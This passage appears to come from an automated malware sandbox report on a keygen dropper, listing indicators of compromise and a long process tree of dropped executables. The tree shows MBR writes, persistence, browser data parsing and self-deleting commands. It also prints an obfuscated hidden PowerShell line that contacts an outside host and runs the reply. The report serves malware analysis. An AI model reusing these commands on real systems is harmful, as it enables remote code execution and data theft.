3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe
3636	multitimer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

file.exemsiexec.exemsiexec.exe

description	pid	process
Token: SeDebugPrivilege	3224	file.exe
Token: SeShutdownPrivilege	2916	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2916	msiexec.exe
Token: SeSecurityPrivilege	512	msiexec.exe
Token: SeCreateTokenPrivilege	2916	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2916	msiexec.exe
Token: SeLockMemoryPrivilege	2916	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2916	msiexec.exe
Token: SeMachineAccountPrivilege	2916	msiexec.exe
Token: SeTcbPrivilege	2916	msiexec.exe
Token: SeSecurityPrivilege	2916	msiexec.exe
Token: SeTakeOwnershipPrivilege	2916	msiexec.exe
Token: SeLoadDriverPrivilege	2916	msiexec.exe
Token: SeSystemProfilePrivilege	2916	msiexec.exe
Token: SeSystemtimePrivilege	2916	msiexec.exe
Token: SeProfSingleProcessPrivilege	2916	msiexec.exe
Token: SeIncBasePriorityPrivilege	2916	msiexec.exe
Token: SeCreatePagefilePrivilege	2916	msiexec.exe
Token: SeCreatePermanentPrivilege	2916	msiexec.exe
Token: SeBackupPrivilege	2916	msiexec.exe
Token: SeRestorePrivilege	2916	msiexec.exe
Token: SeShutdownPrivilege	2916	msiexec.exe
Token: SeDebugPrivilege	2916	msiexec.exe
Token: SeAuditPrivilege	2916	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2916	msiexec.exe
Token: SeChangeNotifyPrivilege	2916	msiexec.exe
Token: SeRemoteShutdownPrivilege	2916	msiexec.exe
Token: SeUndockPrivilege	2916	msiexec.exe
Token: SeSyncAgentPrivilege	2916	msiexec.exe
Token: SeEnableDelegationPrivilege	2916	msiexec.exe
Token: SeManageVolumePrivilege	2916	msiexec.exe
Token: SeImpersonatePrivilege	2916	msiexec.exe
Token: SeCreateGlobalPrivilege	2916	msiexec.exe
Token: SeCreateTokenPrivilege	2916	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2916	msiexec.exe
Token: SeLockMemoryPrivilege	2916	msiexec.exe
Token: SeIncreaseQuotaPrivilege	2916	msiexec.exe
Token: SeMachineAccountPrivilege	2916	msiexec.exe
Token: SeTcbPrivilege	2916	msiexec.exe
Token: SeSecurityPrivilege	2916	msiexec.exe
Token: SeTakeOwnershipPrivilege	2916	msiexec.exe
Token: SeLoadDriverPrivilege	2916	msiexec.exe
Token: SeSystemProfilePrivilege	2916	msiexec.exe
Token: SeSystemtimePrivilege	2916	msiexec.exe
Token: SeProfSingleProcessPrivilege	2916	msiexec.exe
Token: SeIncBasePriorityPrivilege	2916	msiexec.exe
Token: SeCreatePagefilePrivilege	2916	msiexec.exe
Token: SeCreatePermanentPrivilege	2916	msiexec.exe
Token: SeBackupPrivilege	2916	msiexec.exe
Token: SeRestorePrivilege	2916	msiexec.exe
Token: SeShutdownPrivilege	2916	msiexec.exe
Token: SeDebugPrivilege	2916	msiexec.exe
Token: SeAuditPrivilege	2916	msiexec.exe
Token: SeSystemEnvironmentPrivilege	2916	msiexec.exe
Token: SeChangeNotifyPrivilege	2916	msiexec.exe
Token: SeRemoteShutdownPrivilege	2916	msiexec.exe
Token: SeUndockPrivilege	2916	msiexec.exe
Token: SeSyncAgentPrivilege	2916	msiexec.exe
Token: SeEnableDelegationPrivilege	2916	msiexec.exe
Token: SeManageVolumePrivilege	2916	msiexec.exe
Token: SeImpersonatePrivilege	2916	msiexec.exe
Token: SeCreateGlobalPrivilege	2916	msiexec.exe
Token: SeCreateTokenPrivilege	2916	msiexec.exe
Token: SeAssignPrimaryTokenPrivilege	2916	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

msiexec.exe

pid process

2916 msiexec.exe

pid	process
2916	msiexec.exe

Suspicious use of SetWindowsHookEx 14 IoCs

Processes:

Setup.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exewmiprvse.exe1615014376668.exefirefox.exe1615014381668.exefirefox.exe1615014387293.exe2cyz23u2nve.exesafebits.exeaskinstall24.exevict.exe2cyz23u2nve.tmp

pid	process
400	Setup.exe
904	C0CA61A12E4C8B38.exe
3900	C0CA61A12E4C8B38.exe
1924	wmiprvse.exe
3876	1615014376668.exe
5092	firefox.exe
1000	1615014381668.exe
4940	firefox.exe
5016	1615014387293.exe
4476	2cyz23u2nve.exe
4376	safebits.exe
4496	askinstall24.exe
4560	vict.exe
4576	2cyz23u2nve.tmp

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

keygen-step-4.exefile.exe615F.tmp.execmd.exeSetup.exemsiexec.execmd.exeInstall.exeaskinstall20.exeC0CA61A12E4C8B38.exeC0CA61A12E4C8B38.exe

description	pid	process	target process
PID 1112 wrote to memory of 3224	1112	keygen-step-4.exe	file.exe
PID 1112 wrote to memory of 3224	1112	keygen-step-4.exe	file.exe
PID 1112 wrote to memory of 3224	1112	keygen-step-4.exe	file.exe
PID 3224 wrote to memory of 2096	3224	file.exe	615F.tmp.exe
PID 3224 wrote to memory of 2096	3224	file.exe	615F.tmp.exe
PID 3224 wrote to memory of 2096	3224	file.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 2096 wrote to memory of 4000	2096	615F.tmp.exe	615F.tmp.exe
PID 3224 wrote to memory of 992	3224	file.exe	cmd.exe
PID 3224 wrote to memory of 992	3224	file.exe	cmd.exe
PID 3224 wrote to memory of 992	3224	file.exe	cmd.exe
PID 1112 wrote to memory of 400	1112	keygen-step-4.exe	Setup.exe
PID 1112 wrote to memory of 400	1112	keygen-step-4.exe	Setup.exe
PID 1112 wrote to memory of 400	1112	keygen-step-4.exe	Setup.exe
PID 992 wrote to memory of 3236	992	cmd.exe	PING.EXE
PID 992 wrote to memory of 3236	992	cmd.exe	PING.EXE
PID 992 wrote to memory of 3236	992	cmd.exe	PING.EXE
PID 400 wrote to memory of 2916	400	Setup.exe	msiexec.exe
PID 400 wrote to memory of 2916	400	Setup.exe	msiexec.exe
PID 400 wrote to memory of 2916	400	Setup.exe	msiexec.exe
PID 512 wrote to memory of 3616	512	msiexec.exe	MsiExec.exe
PID 512 wrote to memory of 3616	512	msiexec.exe	MsiExec.exe
PID 512 wrote to memory of 3616	512	msiexec.exe	MsiExec.exe
PID 400 wrote to memory of 904	400	Setup.exe	C0CA61A12E4C8B38.exe
PID 400 wrote to memory of 904	400	Setup.exe	C0CA61A12E4C8B38.exe
PID 400 wrote to memory of 904	400	Setup.exe	C0CA61A12E4C8B38.exe
PID 400 wrote to memory of 3900	400	Setup.exe	C0CA61A12E4C8B38.exe
PID 400 wrote to memory of 3900	400	Setup.exe	C0CA61A12E4C8B38.exe
PID 400 wrote to memory of 3900	400	Setup.exe	C0CA61A12E4C8B38.exe
PID 400 wrote to memory of 2232	400	Setup.exe	cmd.exe
PID 400 wrote to memory of 2232	400	Setup.exe	cmd.exe
PID 400 wrote to memory of 2232	400	Setup.exe	cmd.exe
PID 1112 wrote to memory of 3636	1112	keygen-step-4.exe	Install.exe
PID 1112 wrote to memory of 3636	1112	keygen-step-4.exe	Install.exe
PID 2232 wrote to memory of 1464	2232	cmd.exe	PING.EXE
PID 2232 wrote to memory of 1464	2232	cmd.exe	PING.EXE
PID 2232 wrote to memory of 1464	2232	cmd.exe	PING.EXE
PID 3636 wrote to memory of 8	3636	Install.exe	multitimer.exe
PID 3636 wrote to memory of 8	3636	Install.exe	multitimer.exe
PID 1112 wrote to memory of 892	1112	keygen-step-4.exe	askinstall20.exe
PID 1112 wrote to memory of 892	1112	keygen-step-4.exe	askinstall20.exe
PID 1112 wrote to memory of 892	1112	keygen-step-4.exe	askinstall20.exe
PID 892 wrote to memory of 1516	892	askinstall20.exe	cmd.exe
PID 892 wrote to memory of 1516	892	askinstall20.exe	cmd.exe
PID 892 wrote to memory of 1516	892	askinstall20.exe	cmd.exe
PID 904 wrote to memory of 1924	904	C0CA61A12E4C8B38.exe	wmiprvse.exe
PID 904 wrote to memory of 1924	904	C0CA61A12E4C8B38.exe	wmiprvse.exe
PID 3900 wrote to memory of 208	3900	C0CA61A12E4C8B38.exe	cmd.exe
PID 3900 wrote to memory of 208	3900	C0CA61A12E4C8B38.exe	cmd.exe
PID 3900 wrote to memory of 208	3900	C0CA61A12E4C8B38.exe	cmd.exe
PID 904 wrote to memory of 1924	904	C0CA61A12E4C8B38.exe	wmiprvse.exe
PID 904 wrote to memory of 1924	904	C0CA61A12E4C8B38.exe	wmiprvse.exe
PID 904 wrote to memory of 1924	904	C0CA61A12E4C8B38.exe	wmiprvse.exe

C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1112

C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3224

C:\Users\Admin\AppData\Roaming\615F.tmp.exe
"C:\Users\Admin\AppData\Roaming\615F.tmp.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2096

C:\Users\Admin\AppData\Roaming\615F.tmp.exe
"C:\Users\Admin\AppData\Roaming\615F.tmp.exe"
4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4000

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:992

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
4⤵
- Runs ping.exe
PID:3236

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:400

C:\Windows\SysWOW64\msiexec.exe
msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2916

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp1
3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:904

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
4⤵
PID:1924

C:\Users\Admin\AppData\Roaming\1615014376668.exe
"C:\Users\Admin\AppData\Roaming\1615014376668.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014376668.txt"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3876

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:5092

C:\Users\Admin\AppData\Roaming\1615014381668.exe
"C:\Users\Admin\AppData\Roaming\1615014381668.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014381668.txt"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1000

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:4940

C:\Users\Admin\AppData\Roaming\1615014387293.exe
"C:\Users\Admin\AppData\Roaming\1615014387293.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014387293.txt"
4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5016

C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
4⤵
PID:6108

C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe
"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP
4⤵
PID:5892

C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp1
3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3900

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
4⤵
PID:208

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
5⤵
- Kills process with taskkill
PID:2148

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"
4⤵
PID:4236

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
5⤵
- Runs ping.exe
PID:4332

C:\Windows\SysWOW64\cmd.exe
cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"
3⤵
- Suspicious use of WriteProcessMemory
PID:2232

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 3
4⤵
- Runs ping.exe
PID:1464

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3636

C:\Users\Admin\AppData\Local\Temp\33N4J37VE0\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\33N4J37VE0\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:8

C:\Users\Admin\AppData\Local\Temp\33N4J37VE0\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\33N4J37VE0\multitimer.exe" 1 3.1615014596.60432ac408364 101
4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5008

C:\Users\Admin\AppData\Local\Temp\33N4J37VE0\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\33N4J37VE0\multitimer.exe" 2 3.1615014596.60432ac408364
5⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:3636

C:\Users\Admin\AppData\Local\Temp\esj4ltpgxsp\askinstall24.exe
"C:\Users\Admin\AppData\Local\Temp\esj4ltpgxsp\askinstall24.exe"
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4496

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:5068

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
8⤵
- Kills process with taskkill
PID:5728

C:\Users\Admin\AppData\Local\Temp\modbbwnrrkj\2cyz23u2nve.exe
"C:\Users\Admin\AppData\Local\Temp\modbbwnrrkj\2cyz23u2nve.exe" /VERYSILENT
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4476

C:\Users\Admin\AppData\Local\Temp\is-H6MEA.tmp\2cyz23u2nve.tmp
"C:\Users\Admin\AppData\Local\Temp\is-H6MEA.tmp\2cyz23u2nve.tmp" /SL5="$1022C,870426,780800,C:\Users\Admin\AppData\Local\Temp\modbbwnrrkj\2cyz23u2nve.exe" /VERYSILENT
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4576

C:\Users\Admin\AppData\Local\Temp\is-20QTQ.tmp\winlthst.exe
"C:\Users\Admin\AppData\Local\Temp\is-20QTQ.tmp\winlthst.exe" test1 test1
8⤵
PID:4652

C:\Users\Admin\AppData\Local\Temp\rj16ngkaM.exe
"C:\Users\Admin\AppData\Local\Temp\rj16ngkaM.exe"
9⤵
PID:6152

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im rj16ngkaM.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\rj16ngkaM.exe" & del C:\ProgramData\*.dll & exit
10⤵
PID:4844

C:\Windows\SysWOW64\taskkill.exe
taskkill /im rj16ngkaM.exe /f
11⤵
- Kills process with taskkill
PID:5772

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
11⤵
- Delays execution with timeout.exe
PID:4388

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
9⤵
PID:5152

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#####-#ob#jec#t N#et#.W#eb#Cl#ie#nt#).###########Up#loa#dSt##########ri#ng(#''h#t#tp#:#//labsclub.com/#w#el#co#me''#,#''Cr#ys#ta#lP#ig''#############)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
10⤵
PID:2316

C:\Users\Admin\AppData\Local\Temp\3uzke3tw4qu\g3zc0niealn.exe
"C:\Users\Admin\AppData\Local\Temp\3uzke3tw4qu\g3zc0niealn.exe" /ustwo INSTALL
6⤵
- Executes dropped EXE
PID:4644

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 664
7⤵
- Program crash
PID:6048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 652
7⤵
- Program crash
PID:4436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 724
7⤵
- Program crash
PID:4548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 820
7⤵
- Program crash
PID:3932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 884
7⤵
- Program crash
PID:5992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 940
7⤵
- Program crash
PID:6440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4644 -s 1088
7⤵
- Program crash
PID:6608

C:\Users\Admin\AppData\Local\Temp\pla3urhgcuu\qpj44iwqp05.exe
"C:\Users\Admin\AppData\Local\Temp\pla3urhgcuu\qpj44iwqp05.exe" 57a764d042bf8
6⤵
PID:4716

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k "C:\Program Files\IEY2T8DN2G\IEY2T8DN2.exe" 57a764d042bf8 & exit
7⤵
PID:4160

C:\Program Files\IEY2T8DN2G\IEY2T8DN2.exe
"C:\Program Files\IEY2T8DN2G\IEY2T8DN2.exe" 57a764d042bf8
8⤵
PID:5416

C:\Users\Admin\AppData\Local\Temp\rc2rfzdjvtk\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\rc2rfzdjvtk\Setup3310.exe" /Verysilent /subid=577
6⤵
PID:4996

C:\Users\Admin\AppData\Local\Temp\is-P9MJT.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P9MJT.tmp\Setup3310.tmp" /SL5="$2024E,802346,56832,C:\Users\Admin\AppData\Local\Temp\rc2rfzdjvtk\Setup3310.exe" /Verysilent /subid=577
7⤵
PID:4832

C:\Users\Admin\AppData\Local\Temp\is-GS6I6.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-GS6I6.tmp\Setup.exe" /Verysilent
8⤵
PID:4664

C:\Users\Admin\AppData\Local\Temp\is-JV7EI.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JV7EI.tmp\Setup.tmp" /SL5="$202FE,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-GS6I6.tmp\Setup.exe" /Verysilent
9⤵
PID:1796

C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\ProPlugin.exe
"C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\ProPlugin.exe" /Verysilent
10⤵
PID:6388

C:\Users\Admin\AppData\Local\Temp\is-PLSBJ.tmp\ProPlugin.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PLSBJ.tmp\ProPlugin.tmp" /SL5="$3030C,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\ProPlugin.exe" /Verysilent
11⤵
PID:6408

C:\Users\Admin\AppData\Local\Temp\is-TGUSQ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-TGUSQ.tmp\Setup.exe"
12⤵
PID:6928

C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"
13⤵
PID:6988

C:\Windows\regedit.exe
regedit /s chrome.reg
14⤵
- Runs .reg file with regedit
PID:5744

C:\Windows\SYSTEM32\TASKKILL.exe
TASKKILL /F /IM chrome.exe
14⤵
- Kills process with taskkill
PID:5916

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c chrome64.bat
14⤵
PID:4384

C:\Windows\system32\mshta.exe
mshta vbscript:createobject("wscript.shell").run("chrome64.bat h",0)(window.close)
15⤵
PID:6572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\chrome64.bat" h"
16⤵
PID:6696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:/Program Files/Google/Chrome/Application/chrome.exe"
17⤵
PID:6300

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffc48056e00,0x7ffc48056e10,0x7ffc48056e20
18⤵
PID:5084

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1712 /prefetch:8
18⤵
PID:5316

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1664 /prefetch:2
18⤵
PID:2228

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2660 /prefetch:1
18⤵
PID:4704

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2652 /prefetch:1
18⤵
PID:668

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
18⤵
PID:6592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
18⤵
PID:6780

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
18⤵
PID:6112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3652 /prefetch:1
18⤵
PID:5756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4152 /prefetch:8
18⤵
PID:5428

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,18117905732818778682,1514711997518928260,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3936 /prefetch:8
18⤵
PID:2520

C:\Windows\regedit.exe
regedit /s chrome-set.reg
14⤵
- Runs .reg file with regedit
PID:6552

C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
parse.exe -f json -b firefox
14⤵
PID:5800

C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
parse.exe -f json -b chrome
14⤵
PID:4764

C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
parse.exe -f json -b edge
14⤵
PID:5872

C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\PictureLAb.exe" /Verysilent
10⤵
PID:5896

C:\Users\Admin\AppData\Local\Temp\is-BNCC1.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BNCC1.tmp\PictureLAb.tmp" /SL5="$4030C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-BDF4Q.tmp\PictureLAb.exe" /Verysilent
11⤵
PID:2876

C:\Users\Admin\AppData\Local\Temp\is-8M63E.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-8M63E.tmp\Setup.exe" /VERYSILENT
12⤵
PID:3232

C:\Users\Admin\AppData\Local\Temp\is-1MLAP.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1MLAP.tmp\Setup.tmp" /SL5="$30440,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-8M63E.tmp\Setup.exe" /VERYSILENT
13⤵
PID:4568

C:\Users\Admin\AppData\Local\Temp\is-14QQQ.tmp\kkkk.exe
